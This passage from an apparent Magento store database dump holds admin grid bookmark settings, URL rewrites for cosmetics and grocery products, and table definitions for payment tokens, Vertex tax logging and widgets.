"visible\":true,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"billing_name\":5,\"state\":6,\"grand_total\":7,\"store_id\":8,\"billing_address\":9,\"shipping_address\":10,\"customer_name\":11,\"customer_email\":12,\"customer_group_id\":13,\"payment_method\":14,\"shipping_information\":15,\"subtotal\":16,\"shipping_and_handling\":17,\"actions\":18}}}', '2021-04-13 12:07:40', '2021-04-13 12:07:40'),
(38, 2, 'sales_order_view_invoice_grid', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":\"asc\"},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"billing_name\":{\"visible\":true,\"sorting\":false},\"grand_total\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"subtotal\":{\"visible\":false,\"sorting\":false},\"shipping_and_handling\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"state\":{\"visible\":true,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"billing_name\":5,\"state\":6,\"grand_total\":7,\"store_id\":8,\"billing_address\":9,\"shipping_address\":10,\"customer_name\":11,\"customer_email\":12,\"customer_group_id\":13,\"payment_method\":14,\"shipping_information\":15,\"subtotal\":16,\"shipping_and_handling\":17,\"actions\":18}},\"value\":\"Default View\"}}}', '2021-04-13 12:07:42', '2021-04-13 12:07:42'),
(39, 2, 'sales_order_view_creditmemo_grid', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":false},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"billing_name\":{\"visible\":true,\"sorting\":false},\"base_grand_total\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"subtotal\":{\"visible\":false,\"sorting\":false},\"shipping_and_handling\":{\"visible\":false,\"sorting\":false},\"adjustment_positive\":{\"visible\":false,\"sorting\":false},\"adjustment_negative\":{\"visible\":false,\"sorting\":false},\"order_base_grand_total\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"state\":{\"visible\":true,\"sorting\":false},\"order_status\":{\"visible\":false,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"billing_name\":5,\"state\":6,\"base_grand_total\":7,\"order_status\":8,\"store_id\":9,\"billing_address\":10,\"shipping_address\":11,\"customer_name\":12,\"customer_email\":13,\"customer_group_id\":14,\"payment_method\":15,\"shipping_information\":16,\"subtotal\":17,\"shipping_and_handling\":18,\"adjustment_positive\":19,\"adjustment_negative\":20,\"order_base_grand_total\":21,\"actions\":22}},\"value\":\"Default View\"}}}', '2021-04-13 12:07:42', '2021-04-13 12:07:42'),
(40, 2, 'sales_order_view_shipment_grid', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":\"asc\"},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"shipping_name\":{\"visible\":true,\"sorting\":false},\"total_qty\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"order_status\":{\"visible\":false,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"shipping_name\":5,\"total_qty\":6,\"order_status\":7,\"store_id\":8,\"customer_name\":9,\"customer_email\":10,\"customer_group_id\":11,\"billing_address\":12,\"shipping_address\":13,\"payment_method\":14,\"shipping_information\":15,\"actions\":16}},\"value\":\"Default View\"}}}', '2021-04-13 12:07:42', '2021-04-13 12:07:43'),
(41, 2, 'customer_listing', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"entity_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"email\":{\"visible\":true,\"sorting\":false},\"billing_telephone\":{\"visible\":true,\"sorting\":false},\"billing_postcode\":{\"visible\":true,\"sorting\":false},\"billing_region\":{\"visible\":true,\"sorting\":false},\"confirmation\":{\"visible\":true,\"sorting\":false},\"created_in\":{\"visible\":true,\"sorting\":false},\"billing_full\":{\"visible\":false,\"sorting\":false},\"shipping_full\":{\"visible\":false,\"sorting\":false},\"taxvat\":{\"visible\":true,\"sorting\":false},\"billing_street\":{\"visible\":false,\"sorting\":false},\"billing_city\":{\"visible\":false,\"sorting\":false},\"billing_fax\":{\"visible\":false,\"sorting\":false},\"billing_vat_id\":{\"visible\":false,\"sorting\":false},\"billing_company\":{\"visible\":false,\"sorting\":false},\"billing_firstname\":{\"visible\":false,\"sorting\":false},\"billing_lastname\":{\"visible\":false,\"sorting\":false},\"lock_expires\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"group_id\":{\"visible\":true,\"sorting\":false},\"billing_country_id\":{\"visible\":true,\"sorting\":false},\"website_id\":{\"visible\":true,\"sorting\":false},\"gender\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"dob\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"entity_id\":1,\"name\":2,\"email\":3,\"group_id\":4,\"billing_telephone\":5,\"billing_postcode\":6,\"billing_country_id\":7,\"billing_region\":8,\"created_at\":9,\"website_id\":10,\"confirmation\":11,\"created_in\":12,\"billing_full\":13,\"shipping_full\":14,\"dob\":15,\"taxvat\":16,\"gender\":17,\"billing_street\":18,\"billing_city\":19,\"billing_fax\":20,\"billing_vat_id\":21,\"billing_company\":22,\"billing_firstname\":23,\"billing_lastname\":24,\"lock_expires\":25,\"actions\":26}}}', '2021-04-21 06:10:23', '2021-04-21 06:10:23'),
(42, 2, 'customer_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"entity_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"email\":{\"visible\":true,\"sorting\":false},\"billing_telephone\":{\"visible\":true,\"sorting\":false},\"billing_postcode\":{\"visible\":true,\"sorting\":false},\"billing_region\":{\"visible\":true,\"sorting\":false},\"confirmation\":{\"visible\":true,\"sorting\":false},\"created_in\":{\"visible\":true,\"sorting\":false},\"billing_full\":{\"visible\":false,\"sorting\":false},\"shipping_full\":{\"visible\":false,\"sorting\":false},\"taxvat\":{\"visible\":true,\"sorting\":false},\"billing_street\":{\"visible\":false,\"sorting\":false},\"billing_city\":{\"visible\":false,\"sorting\":false},\"billing_fax\":{\"visible\":false,\"sorting\":false},\"billing_vat_id\":{\"visible\":false,\"sorting\":false},\"billing_company\":{\"visible\":false,\"sorting\":false},\"billing_firstname\":{\"visible\":false,\"sorting\":false},\"billing_lastname\":{\"visible\":false,\"sorting\":false},\"lock_expires\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"group_id\":{\"visible\":true,\"sorting\":false},\"billing_country_id\":{\"visible\":true,\"sorting\":false},\"website_id\":{\"visible\":true,\"sorting\":false},\"gender\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"dob\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"entity_id\":1,\"name\":2,\"email\":3,\"group_id\":4,\"billing_telephone\":5,\"billing_postcode\":6,\"billing_country_id\":7,\"billing_region\":8,\"created_at\":9,\"website_id\":10,\"confirmation\":11,\"created_in\":12,\"billing_full\":13,\"shipping_full\":14,\"dob\":15,\"taxvat\":16,\"gender\":17,\"billing_street\":18,\"billing_city\":19,\"billing_fax\":20,\"billing_vat_id\":21,\"billing_company\":22,\"billing_firstname\":23,\"billing_lastname\":24,\"lock_expires\":25,\"actions\":26}},\"value\":\"Default View\"}}}', '2021-04-21 06:10:24', '2021-04-21 06:10:24');

-- --------------------------------------------------------

--
-- Table structure for table `url_rewrite`
--

CREATE TABLE `url_rewrite` (
  `url_rewrite_id` int(10) UNSIGNED NOT NULL COMMENT 'Rewrite ID',
  `entity_type` varchar(32) NOT NULL COMMENT 'Entity type code',
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `request_path` varchar(255) DEFAULT NULL COMMENT 'Request Path',
  `target_path` varchar(255) DEFAULT NULL COMMENT 'Target Path',
  `redirect_type` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Redirect Type',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `description` varchar(255) DEFAULT NULL COMMENT 'Description',
  `is_autogenerated` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is rewrite generated automatically flag',
  `metadata` varchar(255) DEFAULT NULL COMMENT 'Meta data for url rewrite'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Url Rewrites';

--
-- Dumping data for table `url_rewrite`
--

INSERT INTO `url_rewrite` (`url_rewrite_id`, `entity_type`, `entity_id`, `request_path`, `target_path`, `redirect_type`, `store_id`, `description`, `is_autogenerated`, `metadata`) VALUES
(1, 'cms-page', 1, 'no-route', 'cms/page/view/page_id/1', 0, 1, NULL, 1, NULL),
(2, 'cms-page', 2, 'home', 'cms/page/view/page_id/2', 0, 1, NULL, 1, NULL),
(3, 'cms-page', 3, 'enable-cookies', 'cms/page/view/page_id/3', 0, 1, NULL, 1, NULL),
(4, 'cms-page', 4, 'privacy-policy-cookie-restriction-mode', 'cms/page/view/page_id/4', 0, 1, NULL, 1, NULL),
(14, 'category', 4, 'cream.html', 'catalog/category/view/id/4', 0, 1, NULL, 1, NULL),
(16, 'category', 6, 'grocery.html', 'catalog/category/view/id/6', 0, 1, NULL, 1, NULL),
(32, 'category', 8, 'gear.html', 'catalog/category/view/id/8', 0, 1, NULL, 1, NULL),
(181, 'category', 16, 'men.html', 'catalog/category/view/id/16', 0, 1, NULL, 1, NULL),
(759, 'product', 2053, 'erika-running-short.html', 'catalog/product/view/id/2053', 0, 1, NULL, 1, NULL),
(840, 'category', 43, 'what-is-new.html', 'catalog/category/view/id/43', 0, 1, NULL, 1, NULL),
(843, 'cms-page', 5, 'about-us', 'cms/page/view/page_id/5', 0, 1, NULL, 1, NULL),
(844, 'cms-page', 6, 'customer-service', 'cms/page/view/page_id/6', 0, 1, NULL, 1, NULL),
(852, 'product', 2054, 'g-clean-handwash-liquid-soap-pump-200ml-200-00.html', 'catalog/product/view/id/2054', 0, 1, NULL, 1, NULL),
(853, 'product', 2054, 'grocery/g-clean-handwash-liquid-soap-pump-200ml-200-00.html', 'catalog/product/view/id/2054/category/6', 0, 1, NULL, 1, '{\"category_id\":\"6\"}'),
(854, 'product', 2054, 'gear/g-clean-handwash-liquid-soap-pump-200ml-200-00.html', 'catalog/product/view/id/2054/category/8', 0, 1, NULL, 1, '{\"category_id\":\"8\"}'),
(855, 'product', 2055, 'g-clean-handwash-liquid-soap-pump-200ml.html', 'catalog/product/view/id/2055', 0, 1, NULL, 1, NULL),
(856, 'product', 2055, 'cream/g-clean-handwash-liquid-soap-pump-200ml.html', 'catalog/product/view/id/2055/category/4', 0, 1, NULL, 1, '{\"category_id\":\"4\"}'),
(857, 'product', 2055, 'what-is-new/g-clean-handwash-liquid-soap-pump-200ml.html', 'catalog/product/view/id/2055/category/43', 0, 1, NULL, 1, '{\"category_id\":\"43\"}'),
(864, 'product', 2057, 'g-clean-handwash-liquidd-soap-pump-200ml.html', 'catalog/product/view/id/2057', 0, 1, NULL, 1, NULL),
(865, 'product', 2057, 'cream/g-clean-handwash-liquidd-soap-pump-200ml.html', 'catalog/product/view/id/2057/category/4', 0, 1, NULL, 1, '{\"category_id\":\"4\"}'),
(866, 'product', 2057, 'grocery/g-clean-handwash-liquidd-soap-pump-200ml.html', 'catalog/product/view/id/2057/category/6', 0, 1, NULL, 1, '{\"category_id\":\"6\"}'),
(869, 'product', 2057, 'what-is-new/g-clean-handwash-liquidd-soap-pump-200ml.html', 'catalog/product/view/id/2057/category/43', 0, 1, NULL, 1, '{\"category_id\":\"43\"}'),
(873, 'product', 2058, 'ramy-spot-less-fairness-cream.html', 'catalog/product/view/id/2058', 0, 1, NULL, 1, NULL),
(874, 'product', 2058, 'cream/ramy-spot-less-fairness-cream.html', 'catalog/product/view/id/2058/category/4', 0, 1, NULL, 1, '{\"category_id\":\"4\"}'),
(875, 'product', 2058, 'what-is-new/ramy-spot-less-fairness-cream.html', 'catalog/product/view/id/2058/category/43', 0, 1, NULL, 1, '{\"category_id\":\"43\"}'),
(876, 'product', 2058, 'grocery/ramy-spot-less-fairness-cream.html', 'catalog/product/view/id/2058/category/6', 0, 1, NULL, 1, '{\"category_id\":\"6\"}'),
(880, 'product', 2059, 'ramy-moisturizeing-face-wash.html', 'catalog/product/view/id/2059', 0, 1, NULL, 1, NULL),
(882, 'product', 2059, 'what-is-new/ramy-moisturizeing-face-wash.html', 'catalog/product/view/id/2059/category/43', 0, 1, NULL, 1, '{\"category_id\":\"43\"}'),
(883, 'product', 2059, 'grocery/ramy-moisturizeing-face-wash.html', 'catalog/product/view/id/2059/category/6', 0, 1, NULL, 1, '{\"category_id\":\"6\"}'),
(884, 'category', 46, 'cosmetics.html', 'catalog/category/view/id/46', 0, 1, NULL, 1, NULL),
(885, 'product', 2060, 'ramy-moisturizeing-face-wash-ornamental-lemon-extract-made-from-natural.html', 'catalog/product/view/id/2060', 0, 1, NULL, 1, NULL),
(886, 'product', 2060, 'cosmetics/ramy-moisturizeing-face-wash-ornamental-lemon-extract-made-from-natural.html', 'catalog/product/view/id/2060/category/46', 0, 1, NULL, 1, '{\"category_id\":\"46\"}'),
(899, 'product', 2061, 'ramy-spot-cleaner-cream.html', 'catalog/product/view/id/2061', 0, 1, NULL, 1, NULL),
(900, 'product', 2061, 'cream/ramy-spot-cleaner-cream.html', 'catalog/product/view/id/2061/category/4', 0, 1, NULL, 1, '{\"category_id\":\"4\"}'),
(901, 'product', 2061, 'cosmetics/ramy-spot-cleaner-cream.html', 'catalog/product/view/id/2061/category/46', 0, 1, NULL, 1, '{\"category_id\":\"46\"}'),
(902, 'product', 2061, 'grocery/ramy-spot-cleaner-cream.html', 'catalog/product/view/id/2061/category/6', 0, 1, NULL, 1, '{\"category_id\":\"6\"}'),
(905, 'product', 2062, 'ramy-mesta-guard.html', 'catalog/product/view/id/2062', 0, 1, NULL, 1, NULL),
(906, 'product', 2062, 'cosmetics/ramy-mesta-guard.html', 'catalog/product/view/id/2062/category/46', 0, 1, NULL, 1, '{\"category_id\":\"46\"}'),
(907, 'product', 2063, 'ramy-mesta-guard-face.html', 'catalog/product/view/id/2063', 0, 1, NULL, 1, NULL),
(908, 'product', 2063, 'cosmetics/ramy-mesta-guard-face.html', 'catalog/product/view/id/2063/category/46', 0, 1, NULL, 1, '{\"category_id\":\"46\"}'),
(909, 'category', 47, 'discounted-products.html', 'catalog/category/view/id/47', 0, 1, NULL, 1, NULL),
(910, 'product', 2064, 'new-spot.html', 'catalog/product/view/id/2064', 0, 1, NULL, 1, NULL),
(911, 'product', 2064, 'cream/new-spot.html', 'catalog/product/view/id/2064/category/4', 0, 1, NULL, 1, '{\"category_id\":\"4\"}'),
(912, 'product', 2064, 'cosmetics/new-spot.html', 'catalog/product/view/id/2064/category/46', 0, 1, NULL, 1, '{\"category_id\":\"46\"}');

-- --------------------------------------------------------

--
-- Table structure for table `variable`
--

CREATE TABLE `variable` (
  `variable_id` int(10) UNSIGNED NOT NULL COMMENT 'Variable ID',
  `code` varchar(255) DEFAULT NULL COMMENT 'Variable Code',
  `name` varchar(255) DEFAULT NULL COMMENT 'Variable Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Variables';

-- --------------------------------------------------------

--
-- Table structure for table `variable_value`
--

CREATE TABLE `variable_value` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Variable Value ID',
  `variable_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Variable ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `plain_value` text DEFAULT NULL COMMENT 'Plain Text Value',
  `html_value` text DEFAULT NULL COMMENT 'Html Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Variable Value';

-- --------------------------------------------------------

--
-- Table structure for table `vault_payment_token`
--

CREATE TABLE `vault_payment_token` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `public_hash` varchar(128) NOT NULL COMMENT 'Hash code for using on frontend',
  `payment_method_code` varchar(128) NOT NULL COMMENT 'Payment method code',
  `type` varchar(128) NOT NULL COMMENT 'Type',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `expires_at` timestamp NULL DEFAULT NULL COMMENT 'Expires At',
  `gateway_token` varchar(255) NOT NULL COMMENT 'Gateway Token',
  `details` text DEFAULT NULL COMMENT 'Details',
  `is_active` tinyint(1) NOT NULL DEFAULT 1,
  `is_visible` tinyint(1) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Vault tokens of payment';

-- --------------------------------------------------------

--
-- Table structure for table `vault_payment_token_order_payment_link`
--

CREATE TABLE `vault_payment_token_order_payment_link` (
  `order_payment_id` int(10) UNSIGNED NOT NULL COMMENT 'Order payment ID',
  `payment_token_id` int(10) UNSIGNED NOT NULL COMMENT 'Payment token ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Order payments to vault token';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_customer_code`
--

CREATE TABLE `vertex_customer_code` (
  `customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer ID',
  `customer_code` text DEFAULT NULL COMMENT 'Customer Code for Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_customer_code';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_custom_option_flex_field`
--

CREATE TABLE `vertex_custom_option_flex_field` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Map Entity ID',
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Customizable Option ID',
  `website_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `flex_field` text DEFAULT NULL COMMENT 'Flexible Field ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customizable Option to Flex Field Map';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_invoice_sent`
--

CREATE TABLE `vertex_invoice_sent` (
  `invoice_id` int(10) UNSIGNED NOT NULL COMMENT 'Invoice ID',
  `sent_to_vertex` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'Invoice has been logged in Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_invoice_sent';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_order_invoice_status`
--

CREATE TABLE `vertex_order_invoice_status` (
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `sent_to_vertex` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'Invoice has been logged in Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_order_invoice_status';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_sales_creditmemo_item_invoice_text_code`
--

CREATE TABLE `vertex_sales_creditmemo_item_invoice_text_code` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Creditmemo Item ID',
  `invoice_text_code` varchar(100) NOT NULL COMMENT 'Invoice text code from Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_sales_creditmemo_item_invoice_text_code';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_sales_creditmemo_item_tax_code`
--

CREATE TABLE `vertex_sales_creditmemo_item_tax_code` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Creditmemo Item ID',
  `tax_code` varchar(100) NOT NULL COMMENT 'Invoice text code from Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_sales_creditmemo_item_tax_code';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_sales_creditmemo_item_vertex_tax_code`
--

CREATE TABLE `vertex_sales_creditmemo_item_vertex_tax_code` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Creditmemo Item ID',
  `vertex_tax_code` varchar(100) NOT NULL COMMENT 'Text code from Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_sales_creditmemo_item_vertex_tax_code';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_sales_order_item_invoice_text_code`
--

CREATE TABLE `vertex_sales_order_item_invoice_text_code` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Order Item ID',
  `invoice_text_code` varchar(100) NOT NULL COMMENT 'Invoice text code from Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_sales_order_item_invoice_text_code';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_sales_order_item_tax_code`
--

CREATE TABLE `vertex_sales_order_item_tax_code` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Order Item ID',
  `tax_code` varchar(100) NOT NULL COMMENT 'Invoice text code from Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_sales_order_item_tax_code';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_sales_order_item_vertex_tax_code`
--

CREATE TABLE `vertex_sales_order_item_vertex_tax_code` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Order Item ID',
  `vertex_tax_code` varchar(100) NOT NULL COMMENT 'Text code from Vertex'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='vertex_sales_order_item_vertex_tax_code';

-- --------------------------------------------------------

--
-- Table structure for table `vertex_taxrequest`
--

CREATE TABLE `vertex_taxrequest` (
  `request_id` bigint(20) UNSIGNED NOT NULL,
  `request_type` varchar(255) NOT NULL COMMENT 'Request Type',
  `response_time` int(10) UNSIGNED DEFAULT NULL COMMENT 'Milliseconds taken for Vertex API call to complete',
  `quote_id` bigint(20) DEFAULT NULL,
  `order_id` bigint(20) DEFAULT NULL,
  `total_tax` varchar(255) NOT NULL COMMENT 'Total Tax Amount',
  `source_path` varchar(255) NOT NULL COMMENT 'Source path controller_module_action',
  `tax_area_id` varchar(255) NOT NULL COMMENT 'Tax Jurisdictions Id',
  `sub_total` varchar(255) NOT NULL COMMENT 'Response Subtotal Amount',
  `total` varchar(255) NOT NULL COMMENT 'Response Total Amount',
  `lookup_result` varchar(255) NOT NULL COMMENT 'Tax Area Response Lookup Result',
  `request_date` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Request create date',
  `request_xml` text NOT NULL COMMENT 'Request XML',
  `response_xml` text NOT NULL COMMENT 'Response XML'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Log of requests to Vertex';

-- --------------------------------------------------------

--
-- Table structure for table `weee_tax`
--

CREATE TABLE `weee_tax` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `country` varchar(2) DEFAULT NULL COMMENT 'Country',
  `value` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Value',
  `state` int(11) NOT NULL DEFAULT 0 COMMENT 'State',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Weee Tax';

-- --------------------------------------------------------

--
-- Table structure for table `widget`
--

CREATE TABLE `widget` (
  `widget_id` int(10) UNSIGNED NOT NULL COMMENT 'Widget ID',
  `widget_code` varchar(255) DEFAULT NULL COMMENT 'Widget code for template directive',
  `widget_type` varchar(255) DEFAULT NULL COMMENT 'Widget Type',
  `parameters` text DEFAULT NULL COMMENT 'Parameters'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Preconfigured Widgets';

-- --------------------------------------------------------

--
-- Table structure for table `widget_instance`
--

CREATE TABLE `widget_instance` (
  `instance_id` int(10) UNSIGNED NOT NULL COMMENT 'Instance ID',
  `instance_type` varchar(255) DEFAULT NULL COMMENT 'Instance Type',
  `theme_id` int(10) UNSIGNED NOT NULL COMMENT 'Theme ID',
  `title` varchar(255) DEFAULT NULL COMMENT 'Widget Title',
  `store_ids` varchar(255) NOT NULL DEFAULT '0' COMMENT 'Store ids',
  `widget_parameters` text DEFAULT NULL COMMENT 'Widget parameters',
  `sort_order` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Instances of Widget for Package Theme';

--
-- Dumping data for table `widget_instance`
--

INSERT INTO `widget_instance` (`instance_id`, `instance_type`, `theme_id`, `title`, `store_ids`, `widget_parameters`, `sort_order`) VALUES
(1, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'newsletter', '0', '{\"block_id\":\"4\"}', 0),
(2, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'first-banner', '0', '{\"block_id\":\"6\"}', 0),
